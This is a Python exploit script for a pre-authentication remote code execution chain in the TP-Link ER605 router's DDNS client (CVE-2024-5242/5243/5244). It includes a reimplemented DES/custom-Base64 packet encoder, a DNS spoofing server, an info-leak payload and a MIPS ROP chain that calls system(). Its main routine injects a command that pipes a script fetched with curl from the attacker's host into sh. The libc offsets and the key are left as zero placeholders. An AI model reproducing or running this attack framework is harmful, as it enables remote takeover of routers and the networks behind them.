#!/usr/bin/env python3
"""
CVE-2024-5242 / CVE-2024-5243 / CVE-2024-5244
TP-Link ER605 cmxddnsd Pre-Auth RCE Exploit
============================================

Two-phase exploit:
  Phase 1: Info leak via BSS overflow to bypass ASLR
  Phase 2: ROP chain via stack overflow for RCE

Prerequisites:
  - MITM position on target router's WAN interface
  - Ability to intercept DNS queries and spoof responses
  - Ability to serve malicious DDNS responses on UDP 9994

Key insight: ErrorCode value is cached in libc's anonymous mapping region.
This address is NULL-free, making it usable in the ROP payload.

Gadget (MIPS delay slot):
  move $t9, $s0     ; $t9 = system address
  jalr $t9          ; call system()
  move $a0, $s1     ; DELAY SLOT: $a0 = command string

Payload Layout:
  [0-N]:    "7;cmd;" - atoi returns 7, shell executes cmd
  [N-43]:   padding
  [44-47]:  $s0 = system()
  [48-51]:  $s1 = command string address (libc anon region)
  [52-55]:  $ra = ROP gadget
  [56]:     0x01 (field separator)
"""

import socket
import struct
import threading
import sys
import os
import base64
import time

# ============================================================================
# Configuration
# ============================================================================

LISTEN_IP = "0.0.0.0"
DNS_PORT = 53
DDNS_PORT = 9994

ATTACKER_IP = os.environ.get('ATTACKER_IP', '192.168.0.100')

# ============================================================================
# Addresses and Offsets (REDACTED - fill in based on target libc)
# ============================================================================

# libc offsets - must be determined through reverse engineering
LIBC_CMD_OFFSET = 0x0        # Where ErrorCode string is cached (must be NULL-free)
LIBC_SYSTEM_OFFSET = 0x0     # system() function offset
LIBC_GADGET_OFFSET = 0x0     # ROP gadget: move $t9,$s0; jalr $t9; move $a0,$s1

# Info leak configuration
OFFSET_TO_SENDSIZE = 279     # Distance to sendSize variable in _sndDnsQuery
INFO_LEAK_SIZE = 0x0404      # Size to trigger in OOB read

# Info leak analysis offsets - must be determined through dynamic analysis
LEAK_POINTER_OFFSET = 0x0    # Offset in leaked data containing libc pointer
LEAK_TO_LIBC_OFFSET = 0x0    # Offset from leaked pointer to libc base

# ErrorCode stack overflow offsets (fixed based on binary analysis)
ERRORCODE_TO_S0 = 44         # Offset from ErrorCode buffer to saved $s0
ERRORCODE_TO_S1 = 48         # Offset from ErrorCode buffer to saved $s1
ERRORCODE_TO_RA = 52         # Offset from ErrorCode buffer to saved $ra

# ============================================================================
# Crypto Implementation (CVE-2024-5244)
# ============================================================================

# Hardcoded DES key from binary (after extraction from .rodata)
DES_KEY_RAW = bytes([0x00] * 8)  # REDACTED - extract from binary

# Custom Base64 alphabet
STD_B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TPL_B64 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*_"
ENCODE_TABLE = str.maketrans(STD_B64, TPL_B64)

def p32(v): return struct.pack('<I', v & 0xffffffff)
def u32(d): return struct.unpack('<I', d)[0]

def vnc_key(key):
    """VNC-style bit reversal for each byte of the key"""
    result = bytearray(8)
    for i in range(8):
        b = key[i] if i < len(key) else 0
        r = 0
        for bit in range(8):
            if b & (1 << bit):
                r |= (1 << (7 - bit))
        result[i] = r
    return bytes(result)

# DES S-boxes
SBOXES = [
    [14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7,0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8,4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0,15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13],
    [15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10,3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5,0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15,13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9],
    [10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8,13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1,13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7,1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12],
    [7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15,13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9,10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4,3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14],
    [2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9,14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6,4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14,11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3],
    [12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11,10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8,9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6,4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13],
    [4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1,13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6,1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2,6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12],
    [13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7,1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2,7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8,2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11]
]

# DES permutation tables
IP = [58,50,42,34,26,18,10,2,60,52,44,36,28,20,12,4,62,54,46,38,30,22,14,6,64,56,48,40,32,24,16,8,57,49,41,33,25,17,9,1,59,51,43,35,27,19,11,3,61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7]
IP_INV = [40,8,48,16,56,24,64,32,39,7,47,15,55,23,63,31,38,6,46,14,54,22,62,30,37,5,45,13,53,21,61,29,36,4,44,12,52,20,60,28,35,3,43,11,51,19,59,27,34,2,42,10,50,18,58,26,33,1,41,9,49,17,57,25]
E = [32,1,2,3,4,5,4,5,6,7,8,9,8,9,10,11,12,13,12,13,14,15,16,17,16,17,18,19,20,21,20,21,22,23,24,25,24,25,26,27,28,29,28,29,30,31,32,1]
P = [16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10,2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25]
PC1 = [57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4]
PC2 = [14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32]
SHIFTS = [1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1]

def permute(block, table): return [block[x-1] for x in table]
def xor(a, b): return [x ^ y for x, y in zip(a, b)]

def bytes_to_bits(data):
    bits = []
    for byte in data:
        for i in range(7, -1, -1):
            bits.append((byte >> i) & 1)
    return bits

def bits_to_bytes(bits):
    result = []
    for i in range(0, len(bits), 8):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | bits[i + j]
        result.append(byte)
    return bytes(result)

def des_key_schedule(key_bits):
    key56 = permute(key_bits, PC1)
    C, D = key56[:28], key56[28:]
    round_keys = []
    for shift in SHIFTS:
        C = C[shift:] + C[:shift]
        D = D[shift:] + D[:shift]
        round_keys.append(permute(C + D, PC2))
    return round_keys

def des_f(R, K):
    expanded = permute(R, E)
    xored = xor(expanded, K)
    output = []
    for i in range(8):
        chunk = xored[i*6:(i+1)*6]
        row = (chunk[0] << 1) | chunk[5]
        col = (chunk[1] << 3) | (chunk[2] << 2) | (chunk[3] << 1) | chunk[4]
        val = SBOXES[i][row * 16 + col]
        for j in range(3, -1, -1):
            output.append((val >> j) & 1)
    return permute(output, P)

def des_encrypt_block(block_bits, round_keys):
    block = permute(block_bits, IP)
    L, R = block[:32], block[32:]
    for i in range(16):
        new_R = xor(L, des_f(R, round_keys[i]))
        L, R = R, new_R
    return permute(R + L, IP_INV)

def des_encrypt(key8, plaintext):
    ks = des_key_schedule(bytes_to_bits(key8))
    pad_len = 8 - (len(plaintext) % 8)
    padded = plaintext + bytes([pad_len] * pad_len)
    ciphertext = b''
    for i in range(0, len(padded), 8):
        block = bytes_to_bits(padded[i:i+8])
        block = des_encrypt_block(block, ks)
        ciphertext += bits_to_bytes(block)
    return ciphertext

def custom_b64_encode(data):
    """Encode with Comexe's custom Base64 alphabet"""
    return base64.b64encode(data).decode().translate(ENCODE_TABLE)

def tplink_encrypt(data):
    """Full encryption: DES + custom Base64"""
    if isinstance(data, str): data = data.encode()
    return custom_b64_encode(des_encrypt(vnc_key(DES_KEY_RAW), data))

def build_ddns_packet(payload):
    """Build complete DDNS response packet"""
    if isinstance(payload, str): payload = payload.encode()
    return b'\x01C=2\x01Data=' + tplink_encrypt(payload).encode() + b'\x01'

# ============================================================================
# Helpers
# ============================================================================

def check_null_bytes(addr, name):
    """Check if address contains NULL bytes (would break strncpy)"""
    addr_bytes = p32(addr)
    if b'\x00' in addr_bytes:
        print(f"[!] WARNING: {name} (0x{addr:08x}) contains NULL byte: {addr_bytes.hex()}")
        return True
    return False

# ============================================================================
# Phase 1: Info Leak (CVE-2024-5242)
# ============================================================================

def build_info_leak_payload():
    """
    Build payload for BSS overflow -> OOB read info leak.
    
    Overwrites sendSize variable in _sndDnsQuery stack frame,
    causing sendto() to transmit extra memory containing libc pointers.
    """
    # Pad to reach sendSize, then overwrite with large value
    dns_name = b'A' * OFFSET_TO_SENDSIZE
    dns_name += struct.pack('<H', INFO_LEAK_SIZE)
    dns_name += b'/'  # Terminate the copy loop
    
    payload = (
        b'\x01OK=N'
        b'\x01MSG=Error'
        b'\x01ErrorCode=7'           # Triggers UpdateSvr parsing
        b'\x01UpdateSvr1=' + dns_name +
        b'\x01UpdateSvr2=Dns1.comexe.net'
        b'\x01'
    )
    return payload

def analyze_leak(data):
    """
    Analyze leaked data to extract libc base address.
    
    The oversized DNS query contains memory from ddns_instance structure,
    which includes libc pointers that can be used to calculate libc base.
    """
    print(f"\n[LEAK] Received {len(data)} bytes")
    
    if len(data) < LEAK_POINTER_OFFSET + 4:
        print(f"[!] Data too short, need at least {LEAK_POINTER_OFFSET + 4} bytes")
        return None
    
    leaked_ptr = u32(data[LEAK_POINTER_OFFSET:LEAK_POINTER_OFFSET+4])
    libc_base = leaked_ptr - LEAK_TO_LIBC_OFFSET
    
    print(f"[+] Leaked pointer: 0x{leaked_ptr:08x}")
    print(f"[+] libc_base = 0x{libc_base:08x}")
    
    return libc_base

# ============================================================================
# Phase 2: ROP Exploit (CVE-2024-5243)
# ============================================================================

def build_rop_payload(libc_base, command):
    """
    Build ROP payload for ErrorCode stack overflow.
    
    The ErrorCode string is cached in libc's anonymous mapping region,
    which provides a NULL-free address for the command string.
    """
    cmd_addr = libc_base + LIBC_CMD_OFFSET
    system_addr = libc_base + LIBC_SYSTEM_OFFSET
    gadget_addr = libc_base + LIBC_GADGET_OFFSET
    
    print(f"\n[ROP] Building exploit payload")
    print(f"      libc_base:     0x{libc_base:08x}")
    print(f"      cmd_addr:      0x{cmd_addr:08x} (libc + 0x{LIBC_CMD_OFFSET:x})")
    print(f"      system:        0x{system_addr:08x}")
    print(f"      gadget:        0x{gadget_addr:08x}")
    print(f"      command:       {command}")
    
    # Verify no NULL bytes in addresses
    has_null = False
    has_null |= check_null_bytes(cmd_addr, "cmd_addr")
    has_null |= check_null_bytes(system_addr, "system")
    has_null |= check_null_bytes(gadget_addr, "gadget")
    
    if has_null:
        print(f"\n[!] NULL byte detected! Exploit may fail.")
    
    # Build payload (57 bytes total)
    payload = bytearray(57)
    
    # Command string: "7" + shell command
    # "7" makes atoi() return 7, enabling normal function return
    full_cmd = f"7{command}"
    cmd_bytes = full_cmd.encode()
    cmd_len = len(cmd_bytes)
    
    if cmd_len > ERRORCODE_TO_S0:
        print(f"[!] Command too long! Max {ERRORCODE_TO_S0} bytes, got {cmd_len}")
        return None
    
    # [0-N]: Command string
    payload[0:cmd_len] = cmd_bytes
    
    # [N-43]: Padding
    for i in range(cmd_len, ERRORCODE_TO_S0):
        payload[i] = ord('A')
    
    # [44-47]: $s0 = system()
    payload[ERRORCODE_TO_S0:ERRORCODE_TO_S0+4] = p32(system_addr)
    
    # [48-51]: $s1 = command string address
    payload[ERRORCODE_TO_S1:ERRORCODE_TO_S1+4] = p32(cmd_addr)
    
    # [52-55]: $ra = ROP gadget
    payload[ERRORCODE_TO_RA:ERRORCODE_TO_RA+4] = p32(gadget_addr)
    
    # [56]: Field separator
    payload[56] = 0x01
    
    print(f"\n[ROP] ErrorCode payload ({len(payload)} bytes):")
    print(f"      [0-{cmd_len-1}]:   '7{command}' (atoi=7 + shell cmd)")
    print(f"      [{cmd_len}-43]:  'A' padding")
    print(f"      [44-47]:  $s0 = 0x{system_addr:08x} (system)")
    print(f"      [48-51]:  $s1 = 0x{cmd_addr:08x} (cmd in libc anon)")
    print(f"      [52-55]:  $ra = 0x{gadget_addr:08x} (gadget)")
    print(f"      [56]:     0x01 (separator)")
    
    return bytes(payload)

def build_exploit_response(libc_base, command):
    """Build complete exploit DDNS response packet"""
    errorcode_payload = build_rop_payload(libc_base, command)
    if errorcode_payload is None:
        return None
    
    inner = (
        b'\x01OK=N'
        b'\x01MSG=pwned'
        b'\x01ErrorCode=' + errorcode_payload +
        b'UpdateSvr1=x'
        b'\x01'
    )
    
    print(f"\n[ROP] Exploit packet built")
    
    return build_ddns_packet(inner)

# ============================================================================
# Servers
# ============================================================================

class ExploitState:
    """Shared state between DNS and DDNS servers"""
    def __init__(self):
        self.phase = 1           # 1 = info leak, 2 = ROP exploit
        self.libc_base = None
        self.exploit_sent = False
        self.lock = threading.Lock()
        self.command = ";touch /tmp/pwned;"

class DNSServer:
    """
    Malicious DNS server that:
    1. Spoofs responses to redirect DDNS traffic to attacker
    2. Captures oversized queries for info leak analysis
    """
    def __init__(self, state, spoof_ip):
        self.state = state
        self.spoof_ip = spoof_ip
        self.sock = None
        self.running = False
        
    def handle_packet(self, data, addr):
        # Check for info leak (oversized DNS query)
        if len(data) > 100 and self.state.phase == 1:
            print(f"\n[PHASE 1] INFO LEAK! Size: {len(data)} bytes")
            with self.state.lock:
                libc_base = analyze_leak(data)
                if libc_base:
                    self.state.libc_base = libc_base
                    self.state.phase = 2
                    print(f"\n[+] Moving to Phase 2 - ROP Exploit")
        
        # Build spoofed DNS response
        if len(data) >= 12:
            txid = data[:2]
            response = txid + bytes([
                0x81, 0x80,  # Flags: response, no error
                0x00, 0x01,  # Questions: 1
                0x00, 0x01,  # Answers: 1
                0x00, 0x00,  # Authority: 0
                0x00, 0x00   # Additional: 0
            ])
            response += data[12:]  # Copy question section
            response += bytes([
                0xc0, 0x0c,  # Name pointer
                0x00, 0x01,  # Type: A
                0x00, 0x01,  # Class: IN
                0x00, 0x00, 0x00, 0x3c,  # TTL: 60
                0x00, 0x04   # Data length: 4
            ])
            response += socket.inet_aton(self.spoof_ip)
            return response
        return None
        
    def start(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((LISTEN_IP, DNS_PORT))
        self.sock.settimeout(1.0)
        self.running = True
        print(f"[DNS] Server listening on port {DNS_PORT}")
        
        while self.running:
            try:
                data, addr = self.sock.recvfrom(4096)
                response = self.handle_packet(data, addr)
                if response:
                    self.sock.sendto(response, addr)
            except socket.timeout:
                continue
            except Exception as e:
                if self.running:
                    print(f"[DNS] Error: {e}")
                    
    def stop(self):
        self.running = False
        if self.sock:
            self.sock.close()

class DDNSServer:
    """
    Malicious DDNS server that sends exploit payloads.
    Phase 1: Info leak payload
    Phase 2: ROP exploit payload
    """
    def __init__(self, state):
        self.state = state
        self.sock = None
        self.running = False
        
    def start(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((LISTEN_IP, DDNS_PORT))
        self.sock.settimeout(1.0)
        self.running = True
        print(f"[DDNS] Server listening on port {DDNS_PORT}")
        
        while self.running:
            try:
                data, addr = self.sock.recvfrom(4096)
                print(f"\n[DDNS] Request from {addr[0]}:{addr[1]}")
                
                with self.state.lock:
                    if self.state.phase == 1:
                        print(f"\n{'='*60}")
                        print(f"[PHASE 1] Sending info leak payload")
                        print(f"{'='*60}")
                        payload = build_info_leak_payload()
                        response = build_ddns_packet(payload)
                        self.sock.sendto(response, addr)
                        
                    elif self.state.phase == 2 and not self.state.exploit_sent:
                        print(f"\n{'='*60}")
                        print(f"[PHASE 2] Sending ROP exploit!")
                        print(f"{'='*60}")
                        
                        response = build_exploit_response(
                            self.state.libc_base,
                            self.state.command
                        )
                        
                        if response:
                            self.sock.sendto(response, addr)
                            self.state.exploit_sent = True
                            print(f"\n[+] Exploit sent! Check for shell connection.")
                        else:
                            print("[!] Failed to build exploit")
                            # Send benign response
                            benign = b'\x01OK=Y\x01MSG=Success\x01ErrorCode=0\x01'
                            response = build_ddns_packet(benign)
                            self.sock.sendto(response, addr)
                    else:
                        # Already exploited or benign response
                        benign = b'\x01OK=Y\x01MSG=Success\x01ErrorCode=0\x01'
                        response = build_ddns_packet(benign)
                        self.sock.sendto(response, addr)
                        
            except socket.timeout:
                continue
            except Exception as e:
                if self.running:
                    print(f"[DDNS] Error: {e}")
                    import traceback
                    traceback.print_exc()
                    
    def stop(self):
        self.running = False
        if self.sock:
            self.sock.close()

# ============================================================================
# Main
# ============================================================================

def print_banner():
    print("""
╔═══════════════════════════════════════════════════════════════════════╗
║     CVE-2024-5242/5243/5244 - TP-Link ER605 Pre-Auth RCE Exploit      ║
╠═══════════════════════════════════════════════════════════════════════╣
║  Prerequisites:                                                       ║
║    - MITM position on target's WAN interface                          ║
║    - Intercept DNS queries, spoof responses to attacker IP            ║
║                                                                       ║
║  Attack Flow:                                                         ║
║    Phase 1: BSS overflow → OOB read → libc address leak               ║
║    Phase 2: Stack overflow → ROP chain → system(command)              ║
║                                                                       ║
║  ROP Gadget: move $t9,$s0; jalr $t9; move $a0,$s1                     ║
╚═══════════════════════════════════════════════════════════════════════╝
    """)

def main():
    print_banner()
    
    # Check if offsets are configured
    if LIBC_CMD_OFFSET == 0x0 or LIBC_SYSTEM_OFFSET == 0x0 or LIBC_GADGET_OFFSET == 0x0:
        print("[!] WARNING: libc offsets not configured!")
        print("[!] Edit the script to fill in the offset values for your target.")
        print()
    
    if len(sys.argv) < 2:
        print(f"Usage: sudo {sys.argv[0]} <ATTACKER_IP>")
        print(f"Example: sudo {sys.argv[0]} 192.168.0.100")
        return 1
    
    attacker_ip = sys.argv[1]
    command = f";curl {attacker_ip}:8080/s|sh;#"
    
    print(f"[*] Attacker IP: {attacker_ip}")
    print(f"[*] Command: {command}")
    
    # Initialize state
    state = ExploitState()
    state.command = command
    
    # Start DNS server (requires root)
    dns = DNSServer(state, attacker_ip)
    dns_thread = threading.Thread(target=dns.start, daemon=True)
    dns_thread.start()
    
    # Start DDNS server
    ddns = DDNSServer(state)
    
    print(f"\n[*] Servers started!")
    print(f"[*] Waiting for target connection...")
    print(f"[*] (Target must resolve Dns1.comexe.net to {attacker_ip})")
    print(f"[*] Press Ctrl+C to stop\n")
    
    try:
        ddns.start()
    except KeyboardInterrupt:
        print("\n[*] Stopping...")
        dns.stop()
        ddns.stop()
    
    return 0

if __name__ == "__main__":
    sys.exit(main())
